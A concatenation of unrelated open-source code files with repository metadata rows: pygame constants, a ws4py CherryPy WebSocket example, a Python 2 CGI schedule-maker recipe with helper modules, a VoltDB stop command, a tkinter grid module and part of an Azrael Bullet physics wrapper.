# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
""" pygame constants """
from pygame._sdl import sdl
# Event types
NOEVENT = sdl.SDL_NOEVENT
ACTIVEEVENT = sdl.SDL_ACTIVEEVENT
KEYDOWN = sdl.SDL_KEYDOWN
KEYUP = sdl.SDL_KEYUP
MOUSEMOTION = sdl.SDL_MOUSEMOTION
MOUSEBUTTONDOWN = sdl.SDL_MOUSEBUTTONDOWN
MOUSEBUTTONUP = sdl.SDL_MOUSEBUTTONUP
JOYAXISMOTION = sdl.SDL_JOYAXISMOTION
JOYBALLMOTION = sdl.SDL_JOYBALLMOTION
JOYHATMOTION = sdl.SDL_JOYHATMOTION
JOYBUTTONDOWN = sdl.SDL_JOYBUTTONDOWN
JOYBUTTONUP = sdl.SDL_JOYBUTTONUP
QUIT = sdl.SDL_QUIT
SYSWMEVENT = sdl.SDL_SYSWMEVENT
EVENT_RESERVEDA = sdl.SDL_EVENT_RESERVEDA
EVENT_RESERVEDB = sdl.SDL_EVENT_RESERVEDB
VIDEORESIZE = sdl.SDL_VIDEORESIZE
VIDEOEXPOSE = sdl.SDL_VIDEOEXPOSE
EVENT_RESERVED2 = sdl.SDL_EVENT_RESERVED2
EVENT_RESERVED3 = sdl.SDL_EVENT_RESERVED3
EVENT_RESERVED4 = sdl.SDL_EVENT_RESERVED4
EVENT_RESERVED5 = sdl.SDL_EVENT_RESERVED5
EVENT_RESERVED6 = sdl.SDL_EVENT_RESERVED6
EVENT_RESERVED7 = sdl.SDL_EVENT_RESERVED7
USEREVENT = sdl.SDL_USEREVENT
NUMEVENTS = sdl.SDL_NUMEVENTS
USEREVENT_DROPFILE = 0x1000
# Surface things
SWSURFACE = sdl.SDL_SWSURFACE
HWSURFACE = sdl.SDL_HWSURFACE
LIL_ENDIAN = sdl.SDL_LIL_ENDIAN
FULLSCREEN = sdl.SDL_FULLSCREEN
RESIZABLE = sdl.SDL_RESIZABLE
NOFRAME = sdl.SDL_NOFRAME
DOUBLEBUF = sdl.SDL_DOUBLEBUF
HWACCEL = sdl.SDL_HWACCEL
ASYNCBLIT = sdl.SDL_ASYNCBLIT
RLEACCEL = sdl.SDL_RLEACCEL
RLEACCELOK = sdl.SDL_RLEACCELOK
SRCALPHA = sdl.SDL_SRCALPHA
SRCCOLORKEY = sdl.SDL_SRCCOLORKEY
HWPALETTE = sdl.SDL_HWPALETTE
ANYFORMAT = sdl.SDL_ANYFORMAT
BLEND_RGB_ADD = 0x01
BLEND_RGB_SUB = 0x02
BLEND_RGB_MULT = 0x03
BLEND_RGB_MIN = 0x04
BLEND_RGB_MAX = 0x05
BLEND_RGBA_ADD = 0x06
BLEND_RGBA_SUB = 0x07
BLEND_RGBA_MULT = 0x08
BLEND_RGBA_MIN = 0x09
BLEND_RGBA_MAX = 0x10
BLEND_PREMULTIPLIED = 0x11
BLEND_ADD = BLEND_RGB_ADD
BLEND_SUB = BLEND_RGB_SUB
BLEND_MULT = BLEND_RGB_MULT
BLEND_MIN = BLEND_RGB_MIN
BLEND_MAX = BLEND_RGB_MAX
# OpenGL stuff
OPENGL = sdl.SDL_OPENGL
GL_RED_SIZE = sdl.SDL_GL_RED_SIZE
GL_GREEN_SIZE = sdl.SDL_GL_GREEN_SIZE
GL_BLUE_SIZE = sdl.SDL_GL_BLUE_SIZE
GL_ALPHA_SIZE = sdl.SDL_GL_ALPHA_SIZE
GL_BUFFER_SIZE = sdl.SDL_GL_BUFFER_SIZE
GL_DOUBLEBUFFER = sdl.SDL_GL_DOUBLEBUFFER
GL_DEPTH_SIZE = sdl.SDL_GL_DEPTH_SIZE
GL_STENCIL_SIZE = sdl.SDL_GL_STENCIL_SIZE
GL_ACCUM_RED_SIZE = sdl.SDL_GL_ACCUM_RED_SIZE
GL_ACCUM_GREEN_SIZE = sdl.SDL_GL_ACCUM_GREEN_SIZE
GL_ACCUM_BLUE_SIZE = sdl.SDL_GL_ACCUM_BLUE_SIZE
GL_ACCUM_ALPHA_SIZE = sdl.SDL_GL_ACCUM_ALPHA_SIZE
GL_STEREO = sdl.SDL_GL_STEREO
GL_MULTISAMPLEBUFFERS = sdl.SDL_GL_MULTISAMPLEBUFFERS
GL_MULTISAMPLESAMPLES = sdl.SDL_GL_MULTISAMPLESAMPLES
GL_ACCELERATED_VISUAL = sdl.SDL_GL_ACCELERATED_VISUAL
GL_SWAP_CONTROL = sdl.SDL_GL_SWAP_CONTROL
# Keys
from pygame._sdl_keys import *
| lgpl-2.1 | 2,889,663,793,123,178,000 | 29.2 | 68 | 0.772903 | false |
KanoComputing/nush | ws4py/droid_sensor_cherrypy_server.py | 1 | 2357 | # -*- coding: utf-8 -*-
import os.path
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.websocket import WebSocket
class BroadcastWebSocketHandler(WebSocket):
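    # Note (added for clarity): every message received from any client is
    # republished on the CherryPy bus; the WebSocketPlugin subscribed in
    # __main__ then pushes it to all connected WebSocket clients.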
def received_message(self, m):
cherrypy.engine.publish('websocket-broadcast', str(m))
class Root(object):
@cherrypy.expose
def index(self):
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>WebSocket example displaying Android device sensors</title>
<link rel="stylesheet" href="/css/style.css" type="text/css" />
<script type="application/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"> </script>
<script type="application/javascript" src="https://raw.github.com/caleb531/jcanvas/master/jcanvas.min.js"> </script>
<script type="application/javascript" src="/js/droidsensor.js"> </script>
<script type="application/javascript">
$(document).ready(function() {
initWebSocket();
drawAll();
});
</script>
</head>
<body>
<section id="content" class="body">
<canvas id="canvas" width="900" height="620"></canvas>
</section>
</body>
</html>
"""
@cherrypy.expose
def ws(self):
cherrypy.log("Handler created: %s" % repr(cherrypy.request.ws_handler))
if __name__ == '__main__':
cherrypy.config.update({
'server.socket_host': '192.168.0.12',
'server.socket_port': 11000,
'tools.staticdir.root': os.path.abspath(os.path.join(os.path.dirname(__file__), 'static'))
}
)
print os.path.abspath(os.path.join(__file__, 'static'))
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
cherrypy.quickstart(Root(), '', config={
'/js': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'js'
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'css'
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'images'
},
'/ws': {
'tools.websocket.on': True,
'tools.websocket.handler_cls': BroadcastWebSocketHandler
}
}
)
| gpl-3.0 | -3,472,286,452,983,433,700 | 31.287671 | 125 | 0.585914 | false |
ActiveState/code | recipes/Python/475112_Schedule_Maker/recipe-475112.py | 1 | 14819 | ################################################################################
# index.py
################################################################################
import html_help
import os
import sys
import time
import Zcgi
KEYS = 'description', 'start', 'end', 'sunday', 'monday', \
'tuesday', 'wednesday', 'thursday', 'friday', 'saturday'
class soft_dict:
def __init__(self, dictionary, format):
self.__dictionary = dictionary
self.__format = format
def __getitem__(self, key):
try:
if self.__dictionary[key]:
return self.__format % self.__dictionary[key]
except:
pass
return ''
class WeekError:
def __init__(self, string):
self.__string = string
def __str__(self):
return self.__string
def main():
if Zcgi.dictionary is None:
show_form()
elif has_keys(Zcgi.dictionary, KEYS):
show_table()
else:
show_form()
def show_form(error=''):
if error:
error = '\t\t<b>' + error + '</b>\n'
values = soft_dict(Zcgi.dictionary, ' value="%s"')
Zcgi.print_html('''<html>
\t<head>
\t\t<title>
\t\t\tSchedule Maker
\t\t</title>
\t</head>
\t<body>
%s\t\t<form action="%s">
\t\t\tDescription:<br>
\t\t\t<input type="text"%s name="description" size="25"><br>
\t\t\tStart Date:<br>
\t\t\t<input type="text"%s name="start" size="25"><br>
\t\t\tEnd Date:<br>
\t\t\t<input type="text"%s name="end" size="25"><br>
\t\t\tSunday:<br>
\t\t\t<input type="text"%s name="sunday" size="25"><br>
\t\t\tMonday:<br>
\t\t\t<input type="text"%s name="monday" size="25"><br>
\t\t\tTuesday:<br>
\t\t\t<input type="text"%s name="tuesday" size="25"><br>
\t\t\tWednesday:<br>
\t\t\t<input type="text"%s name="wednesday" size="25"><br>
\t\t\tThursday:<br>
\t\t\t<input type="text"%s name="thursday" size="25"><br>
\t\t\tFriday:<br>
\t\t\t<input type="text"%s name="friday" size="25"><br>
\t\t\tSaturday:<br>
\t\t\t<input type="text"%s name="saturday" size="25"><br>
\t\t\t<input type="submit" value="Create Schedule">
\t\t</form>
\t</body>
</html>''' % tuple([error, os.path.basename(sys.argv[0])] \
+ unpack(values, KEYS)))
def has_keys(dictionary, keys):
for key in keys:
if not dictionary.has_key(key):
return False
return True
def show_table():
values = Zcgi.dictionary
if not values['description']:
show_form('You must enter a description.')
try:
start = time.strptime(values['start'], '%m/%d/%y')
end = time.strptime(values['end'], '%m/%d/%y')
except:
show_form('Dates must be in the MM/DD/YY format.')
try:
assert time.mktime(end) > time.mktime(start)
except:
show_form('The end date must come after the start date.')
try:
check_week(values, KEYS[3:])
except WeekError, problem:
show_form(str(problem))
html = create_html(values['description'], start, end, unpack(values, KEYS[3:]))
Zcgi.print_html(html)
def unpack(values, keys):
unpacked = []
for key in keys:
unpacked.append(values[key])
return unpacked
def check_week(dictionary, keys):
for key in keys:
try:
if not dictionary[key]:
continue
hm = dictionary[key].split('-')
assert len(hm) == 2
first = time.strptime(hm[0].strip(), '%H:%M')
second = time.strptime(hm[1].strip(), '%H:%M')
dictionary[key] = hm[0].strip() + ' - ' + hm[1].strip()
except:
raise WeekError(key.capitalize() + ' should be in the HH:MM - HH:MM format.')
try:
assert second.tm_hour * 60 + second.tm_min > first.tm_hour * 60 + first.tm_min
except:
raise WeekError('Start time must come before end time on ' + key.capitalize() + '.')
def create_html(description, start, end, week):
html = '''<html>
\t<head>
\t\t<title>
\t\t\tThe Schedule
\t\t</title>
\t</head>
\t<body>
\t\t<center>
'''
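    # Work with absolute month numbers (year * 12 + month index) so the
    # schedule can span year boundaries.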
start_month = start.tm_year * 12 + (start.tm_mon - 1)
end_month = end.tm_year * 12 + (end.tm_mon - 1)
for month in range(start_month, end_month + 1):
html += html_help.html_table(1, 1, 3, '\t').mutate(0, 0, create_month_html(description, start, end, week, month)).html() + '\n'
if month != end_month:
html += '\t\t\t<hr>\n'
return html + '\t\t</center>\n\t</body>\n</html>'
def create_month_html(description, start, end, week, month):
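    # Pad the range by half a day (43200 s) on each side so the start and end
    # dates themselves always fall inside the window.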
start = time.mktime(start) - 43200
end = time.mktime(end) + 43200
now = time.strptime(str((month / 12) % 100).zfill(2) + ' ' + str(month % 12 + 1) + ' 01', '%y %m %d')
html = '<b>' + time.strftime('%B %Y', now) + '</b>\n'
html_month = html_help.html_month((month / 12) % 100, month % 12 + 1, 0, '\t')
html_month.table_option('border="1" width="800"').row_option('valign="top"').column_option('width="14%"')
now_month = now.tm_mon
while now.tm_mon == now_month:
mktime = time.mktime(now)
if start <= mktime <= end:
week_day = (now.tm_wday + 1) % 7
if week[week_day]:
html_month.mutate(now.tm_mday, '<b>' + description + '</b><br>\n' + week[week_day])
now = time.localtime(mktime + 86400)
return html + html_month.html()
if __name__ == '__main__':
Zcgi.execute(main, 'cgi')
################################################################################
# html_help.py
################################################################################
import time
import Zam
class html_table:
def __init__(self, rows, columns, indent, style):
self.__matrix = Zam.matrix(rows, columns, '')
self.__indent = indent
self.__style = style
self.__table_option = ''
self.__row_option = ''
self.__column_option = ''
def mutate(self, row, column, text):
assert type(text) is str
self.__matrix[row][column] = text
return self
def access(self, row, column):
return self.__matrix[row][column]
def table_option(self, string):
assert type(string) is str
self.__table_option = string
return self
def row_option(self, string):
assert type(string) is str
self.__row_option = string
return self
def column_option(self, string):
assert type(string) is str
self.__column_option = string
return self
def html(self):
html = self.__style * self.__indent + '<table'
if self.__table_option:
html += ' ' + self.__table_option
html += '>\n'
for row in self.__matrix:
html += self.__style * (self.__indent + 1) + '<tr'
if self.__row_option:
html += ' ' + self.__row_option
html += '>\n'
for item in row:
html += self.__style * (self.__indent + 2) + '<td'
if self.__column_option:
html += ' ' + self.__column_option
html += '>\n'
html += ''.join([self.__style * (self.__indent + 3) + line + '\n' for line in item.splitlines()])
html += self.__style * (self.__indent + 2) + '</td>\n'
html += self.__style * (self.__indent + 1) + '</tr>\n'
return html + self.__style * self.__indent + '</table>'
class html_month:
def __init__(self, year, month, indent, style):
matrix = self.__make_matrix(year, month)
self.__table = html_table(len(matrix) + 1, 7, indent, style)
for index, item in enumerate(('Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday')):
self.__table.mutate(0, index, '<b>' + item + '</b>')
for row in range(len(matrix)):
for column in range(7):
if matrix[row][column]:
self.__table.mutate(row + 1, column, '<b>' + str(matrix[row][column]).zfill(2) + '</b>\n<hr>\n')
def __make_matrix(self, year, month):
rows = [Zam.array(7, 0)]
row = 0
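        # 14400 s = 4 h: anchor each day at 04:00 so a DST shift cannot move
        # the timestamp back into the previous day.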
now = time.localtime(time.mktime(time.strptime(str(year).zfill(2) + ' ' + str(month).zfill(2) + ' 01', '%y %m %d')) + 14400)
self.__first_day = (now.tm_wday + 1) % 7
once = False
while now.tm_mon == month:
if once:
if now.tm_wday == 6:
rows.append(Zam.array(7, 0))
row += 1
else:
once = True
rows[row][(now.tm_wday + 1) % 7] = now.tm_mday
self.__days_in_month = now.tm_mday
now = time.localtime(time.mktime(now) + 86400)
return rows
def mutate(self, day, text):
row, column = self.__get_pos(day)
self.__table.mutate(row, column, self.__table.access(row, column)[:15] + text)
return self
def access(self, day):
row, column = self.__get_pos(day)
return self.__table.access(row, column)[15:]
def __get_pos(self, day):
assert 1 <= day <= self.__days_in_month
pos = self.__first_day - 1 + day
return pos / 7 + 1, pos % 7
def table_option(self, string):
self.__table.table_option(string)
return self
def row_option(self, string):
self.__table.row_option(string)
return self
def column_option(self, string):
self.__table.column_option(string)
return self
def html(self):
return self.__table.html()
################################################################################
# Zam.py
################################################################################
# Name & Description
# ==================
'''Support module for array and matrix use.
This module provides two classes that emulate one and two
dimensional lists with fixed sizes but mutable internals.'''
# Data & Imports
# ==============
__all__ = ['array', 'matrix']
__version__ = '1.1'
import sys
# Public Names
# ============
class array(object):
'''array(length) -> new array
array(length, value) -> initialized from value'''
def __init__(self, length, value=None):
'''x.__init__(...) initializes x'''
self.__data = range(length)
for index in range(length):
self.__data[index] = value
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = value
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = None
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
return value in self.__data
class matrix(object):
'''matrix(rows, columns) -> new matrix
matrix(rows, columns, value) -> initialized from value'''
def __init__(self, rows, columns, value=None):
'''x.__init__(...) initializes x'''
self.__data = array(rows)
for index in range(rows):
self.__data[index] = array(columns, value)
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = array(len(self.__data[key]), value)
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = array(len(self.__data[key]))
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
for item in self.__data:
if value in item:
return True
return False
# Private Names
# =============
def main():
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
# Execute Main
# ============
if __name__ == '__main__':
main()
################################################################################
# Zcgi.py
################################################################################
# Name & Description
# ==================
'''Support module for use by CGI scripts.
This module provides several functions and variables
that help with printing text and accessing form data.'''
# Data & Imports
# ==============
__all__ = ['execute', 'print_html', 'print_plain', 'print_self',
'dictionary', 'string']
__version__ = '1.2'
import os
import sys
import types
# Public Names
# ============
def execute(main, exception):
'''execute(function main, str exception)
Execute main unless exception.'''
assert_type((types.FunctionType, main), (str, exception))
if exception == string:
print_self()
else:
main()
def print_html(text):
'''print_html(str text)
Print text as HTML.'''
assert_type((str, text))
print 'Content-Type: text/html'
print
print text
sys.exit(0)
def print_plain(text):
'''print_plain(str text)
Print text as plain.'''
assert_type((str, text))
print 'Content-Type: text/plain'
print
print text
sys.exit(0)
def print_self():
'''print_self()
Print __main__ as plain.'''
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
sys.exit(0)
# Private Names
# =============
def export():
global dictionary, string
dictionary = string = None
try:
string = os.environ['QUERY_STRING']
temp = string.replace('+', ' ').split('&')
for index in range(len(temp)):
temp[index] = temp[index].split('=')
dictionary = dict()
for parameter, value in temp:
dictionary[decode(parameter)] = decode(value)
except:
pass
def decode(string):
assert_type((str, string))
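    # Replace each %XX escape with the character it encodes.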
index = string.find('%')
while index != -1:
string = string[:index] + chr(int(string[index+1:index+3], 16)) + string[index+3:]
index = string.find('%', index + 1)
return string
def assert_type(*tuples):
for types, objects in tuples:
if type(objects) is not types:
raise TypeError
# Execute Conditional
# ===================
if __name__ == '__main__':
print_self()
else:
export()
| mit | -5,567,249,290,560,385,000 | 28.228797 | 135 | 0.512113 | false |
eoneil1942/voltdb-4.7fix | lib/python/voltcli/voltdb.d/stop.py | 1 | 1682 | # This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import signal
from voltcli import utility
@VOLT.Command(
description = 'Stop a VoltDB server daemon.',
options = [
VOLT.StringOption('-H', '--host', 'host',
'HOST[:PORT] (default HOST=localhost, PORT=3021)',
default='localhost:3021'),
]
)
def stop(runner):
daemonizer = runner.create_daemonizer(description="VoltDB server")
daemonizer.stop_daemon() | agpl-3.0 | -6,828,493,845,769,102,000 | 40.04878 | 73 | 0.743757 | false |
efanescent/SapidCircuits | World.py | 1 | 2775 | import Control
from tkinter.messagebox import showerror
from Window import *
from Utils import *
canvas, field, scale = None, None, None
def init(window, p_field=-1, p_scale=10):
"""using to init World with params"""
global canvas, field, scale
canvas = tk.Canvas(window, highlightthickness=0, bg='#FFF3A4')
canvas.pack(side='top', fill='both', expand=True)
field = p_field
scale = p_scale
# auto setting control
try: set_control()
except:
showerror('Error', 'Control can\'t be set')
def set_field(p_field):
"""set up field in the world"""
global field
field = p_field
def clear():
"""remove all elements from canvas"""
global canvas
canvas.delete('all')
def scale_(*args, **kwargs):
"""universal function for set/get/change scale
if arg is num - change scale
if kwarg wiz index 'set' - set scale
and then return current scale"""
global scale
for arg in args:
if isinstance(scale, (int, float)):
scale += arg
for key in kwargs:
if key == 'set':
scale = kwargs[key]
return scale
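# Illustrative calls (added for clarity; not part of the original module):
#   scale_()          # -> current scale
#   scale_(5)         # add 5 to the scale, then return it
#   scale_(set=30)    # overwrite the scale, then return it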
def draw():
global canvas, field, scale
if field == -1: return False
# possibly this is bad idea... idk
clear()
# redraw empty tiles
cx, cy = field.x, field.y
for col in range(int(field.height)):
for row in range(int(field.width)):
canvas.create_rectangle(cx, cy, cx+1000/scale, cy+1000/scale)
cx += (1000/scale)
cx = field.x
cy += (1000/scale)
def set_control():
"""set control..."""
canvas.master.bind_all('<Key>', Control.pressed)
def move_view(**kwargs):
for key in kwargs:
if key == 'x':
canvas.xview_scroll(int(kwargs[key]), 'units')
if key == 'y':
canvas.yview_scroll(int(kwargs[key]), 'units')
class Field:
"""class contains tiles"""
def __init__(self, sx, sy, width, height):
self.x = sx # start x
self.y = sy # start y
# width 'n' height in units (f.e. 2x3 = 6units or tiles)
self.width = width
self.height = height
self.tiles = dict() # no tiles, excepting empty
def add_tile(self, tx, ty, tile):
"""add tile in tiles container"""
self.tiles[tile_xy2i(tx, ty)] = tile
def get_tile(self, tx, ty):
"""return tile from tiles container"""
try:
return self.tiles[tile_xy2i(tx, ty)]
except:
return -1
def is_empty_tile(self, tx, ty):
"""return bool - tile is empty"""
try:
self.tiles[tile_xy2i(tx, ty)]
except:
return True
else:
return False
class Tile:
def __init__(self, Id):
self.ID = Id | mit | 5,046,132,535,887,485,000 | 24.943925 | 73 | 0.57045 | false |
daviddeng/azrael | azrael/bullet_api.py | 1 | 21037 | # Copyright 2014, Oliver Nagy <[email protected]>
#
# This file is part of Azrael (https://github.com/olitheolix/azrael)
#
# Azrael is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Azrael is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Azrael. If not, see <http://www.gnu.org/licenses/>.
"""
Provide classes to create-, modify- and query dynamic simulations. The classes
abstract away the particular physics engine (currently Bullet) used underneath.
This module is the *one and only* module that actually imports the Bullet
engine (ie the wrapper called `azBullet`). This will make it easier to swap out
Bullet for another engine at some point, should the need arise.
"""
import logging
import numpy as np
import azrael.types as types
import azrael.bullet.azBullet as azBullet
from IPython import embed as ipshell
from azrael.types import typecheck, RetVal, _RigidBodyData
from azrael.types import ConstraintMeta, ConstraintP2P, Constraint6DofSpring2
from azrael.types import CollShapeMeta, CollShapeSphere, CollShapeBox, CollShapePlane
# Convenience.
Vec3 = azBullet.Vec3
Quaternion = azBullet.Quaternion
Transform = azBullet.Transform
# Convenience.
RigidBodyData = types.RigidBodyData
class PyRigidBody(azBullet.RigidBody):
"""
Wrapper around RigidBody class.
The original azBullet.RigidBody class cannot be extended since it is a
compiled module. However, by subclassing it we get the convenience of
a pure Python class (eg adding attributes at runtime). This is transparent
to the end user.
"""
def __init__(self, ci):
super().__init__(ci)
class PyBulletDynamicsWorld():
"""
High level wrapper around the low level Bullet bindings.
"""
def __init__(self, engineID: int):
# Create a Class-specific logger.
name = '.'.join([__name__, self.__class__.__name__])
self.logit = logging.getLogger(name)
# To distinguish engines.
self.engineID = engineID
# Create a standard Bullet Dynamics World.
self.dynamicsWorld = azBullet.BulletBase()
# Disable gravity.
self.dynamicsWorld.setGravity(Vec3(0, 0, 0))
# Dictionary of all bodies.
self.rigidBodies = {}
def setGravity(self, gravity: (tuple, list)):
"""
Set the ``gravity`` in the simulation.
"""
try:
gravity = np.array(gravity, np.float64)
assert gravity.ndim == 1
assert len(gravity) == 3
except (TypeError, ValueError, AssertionError):
return RetVal(False, 'Invalid type', None)
self.dynamicsWorld.setGravity(Vec3(*gravity))
return RetVal(True, None, None)
def removeRigidBody(self, bodyIDs: (list, tuple)):
"""
Remove ``bodyIDs`` from Bullet and return the number of removed bodies.
Non-existing bodies are not counted (and ignored).
:param list bodyIDs: list of bodyIDs to remove.
:return: number of actually removed bodies.
:rtype: int
"""
cnt = 0
# Remove every body, skipping non-existing ones.
for bodyID in bodyIDs:
# Skip non-existing bodies.
if bodyID not in self.rigidBodies:
continue
# Delete the body from all caches.
del self.rigidBodies[bodyID]
cnt += 1
# Return the total number of removed bodies.
return RetVal(True, None, cnt)
def compute(self, bodyIDs: (tuple, list), dt: float, max_substeps: int):
"""
Step the simulation for all ``bodyIDs`` by ``dt``.
This method aborts immediately if one or more bodyIDs do not exist.
The ``max_substeps`` parameter tells Bullet the maximum allowed
granularity. Typiclal values for ``dt`` and ``max_substeps`` are
(1, 60).
:param list bodyIDs: list of bodyIDs for which to update the physics.
:param float dt: time step in seconds
:param int max_substeps: maximum number of sub-steps.
:return: Success
"""
# All specified bodies must exist. Abort otherwise.
try:
rigidBodies = [self.rigidBodies[_] for _ in bodyIDs]
except KeyError as err:
self.logit.warning('Body IDs {} do not exist'.format(err.args))
return RetVal(False, None, None)
# Add the body to the world and make sure it is activated, as
# Bullet may otherwise decide to simply set its velocity to zero
# and ignore the body.
for body in rigidBodies:
self.dynamicsWorld.addRigidBody(body)
body.forceActivationState(4)
# The max_substeps parameter instructs Bullet to subdivide the
# specified timestep (dt) into at most max_substeps. For example, if
# dt= 0.1 and max_substeps=10, then, internally, Bullet will simulate
# no finer than dt / max_substeps = 0.01s.
self.dynamicsWorld.stepSimulation(dt, max_substeps)
# Remove all bodies from the simulation again.
for body in rigidBodies:
self.dynamicsWorld.removeRigidBody(body)
return RetVal(True, None, None)
def applyForceAndTorque(self, bodyID, force, torque):
"""
Apply a ``force`` and ``torque`` to the center of mass of ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array torque: torque around center of mass.
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
self.logit.warning(msg)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_torque = Vec3(*torque)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyCentralForce(b_force)
body.applyTorque(b_torque)
return RetVal(True, None, None)
def applyForce(self, bodyID: int, force, rel_pos):
"""
Apply a ``force`` at ``rel_pos`` to ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array rel_pos: position of force relative to center of mass
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_relpos = Vec3(*rel_pos)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyForce(b_force, b_relpos)
return RetVal(True, None, None)
def getRigidBodyData(self, bodyID: int):
"""
Return Body State of ``bodyID``.
        This method aborts immediately if ``bodyID`` does not exist.
:param int bodyID: the ID of body for which to return the state.
:return: ``_RigidBodyData`` instances.
"""
# Abort immediately if the ID is unknown.
if bodyID not in self.rigidBodies:
msg = 'Cannot find body with ID <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Determine rotation and position.
rot = body.getCenterOfMassTransform().getRotation().topy()
pos = body.getCenterOfMassTransform().getOrigin().topy()
# Determine linear and angular velocity.
vLin = body.getLinearVelocity().topy()
vRot = body.getAngularVelocity().topy()
        # Linear/angular factors (used to lock axes).
axesLockLin = body.getLinearFactor().topy()
axesLockRot = body.getAngularFactor().topy()
        # Bullet does not support scaling collision shapes (actually, it does,
        # but it is fraught with problems). We therefore copy the 'scale'
        # value from the body's meta data.
scale = body.azrael[1].scale
# Bullet will never modify the Collision shape. We may thus use the
# information from the body's meta data.
cshapes = body.azrael[1].cshapes
# Construct a new _RigidBodyData structure and add it to the list
# that will eventually be returned to the caller.
out = _RigidBodyData(scale, body.getInvMass(),
body.getRestitution(), rot, pos, vLin, vRot,
cshapes, axesLockLin, axesLockRot, 0)
return RetVal(True, None, out)
@typecheck
def setRigidBodyData(self, bodyID: int, rbState: _RigidBodyData):
"""
Update State Variables of ``bodyID`` to ``rbState``.
Create a new body with ``bodyID`` if it does not yet exist.
        :param int bodyID: ID of the body to create or update.
:param ``_RigidBodyData`` rbState: body description.
:return: Success
"""
# Create the Rigid Body if it does not exist yet.
if bodyID not in self.rigidBodies:
self.createRigidBody(bodyID, rbState)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert rotation and position to Vec3.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Assign body properties.
tmp = azBullet.Transform(rot, pos)
body.setCenterOfMassTransform(tmp)
body.setLinearVelocity(Vec3(*rbState.velocityLin))
body.setAngularVelocity(Vec3(*rbState.velocityRot))
body.setRestitution(rbState.restitution)
body.setLinearFactor(Vec3(*rbState.axesLockLin))
body.setAngularFactor(Vec3(*rbState.axesLockRot))
# Build and assign the new collision shape, if necessary.
old = body.azrael[1]
if (old.scale != rbState.scale) or \
not (np.array_equal(old.cshapes, rbState.cshapes)):
# Create a new collision shape.
tmp = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = tmp.data
del mass, inertia, tmp
# Replace the existing collision shape with the new one.
body.setCollisionShape(cshapes)
del old
